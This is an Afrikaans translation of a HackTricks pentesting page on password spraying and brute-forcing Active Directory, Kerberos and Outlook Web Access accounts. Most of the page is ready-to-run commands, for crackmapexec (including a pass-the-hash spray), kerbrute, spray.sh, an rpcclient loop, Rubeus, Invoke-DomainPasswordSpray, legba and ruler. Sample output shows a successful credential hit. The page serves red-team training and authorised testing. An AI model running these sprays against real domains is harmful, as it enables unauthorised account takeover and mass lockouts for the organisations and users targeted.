hacktricks/windows-hardening/active-directory-methodology/password-spraying.md
2024-02-11 02:07:06 +00:00

8 KiB

Wagtendheid van wagwoorde / Brute Force

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Wagtendheid van wagwoorde

Sodra jy verskeie geldige gebruikersname gevind het, kan jy die mees gewone wagwoorde (hou die wagwoordbeleid van die omgewing in gedagte) probeer met elkeen van die ontdekte gebruikers.
Die minimum wagwoordlengte is 7 standaard.

Lyste van algemene gebruikersname kan ook nuttig wees: https://github.com/insidetrust/statistically-likely-usernames

Let daarop dat jy rekeninge kan blokkeer as jy verskeie verkeerde wagwoorde probeer (standaard meer as 10).

Kry wagwoordbeleid

As jy enkele gebruikerskredentiale het of 'n skulp as 'n domein-gebruiker het, kan jy die wagwoordbeleid kry met:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Uitbuiting vanaf Linux (of enige ander platform)

  • Gebruik van crackmapexec:
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • spuit (jy kan die aantal pogings aandui om sluitings te vermy):
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • Gebruik kerbrute (python) - NIE AANBEVEEL NIE, WERK SOMS NIE
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • Met die scanner/smb/smb_login module van Metasploit:

  • Deur rpcclient te gebruik:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Vanaf Windows

  • Met Rubeus weergawe met brute module:
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • Met Invoke-DomainPasswordSpray (Dit kan standaard gebruikers genereren vanaf die domein en dit sal die wagwoordbeleid van die domein kry en pogings daaraan beperk):
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

Brute Force

{% code overflow="wrap" %}

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

{% endcode %}

Outlook Web Access

Daar is verskeie hulpmiddels vir die wagwoordspuit van Outlook.

Om enige van hierdie hulpmiddels te gebruik, het jy 'n gebruikerslys en 'n wagwoord / 'n klein lys van wagwoorde nodig om te spuit.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

Verwysings

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: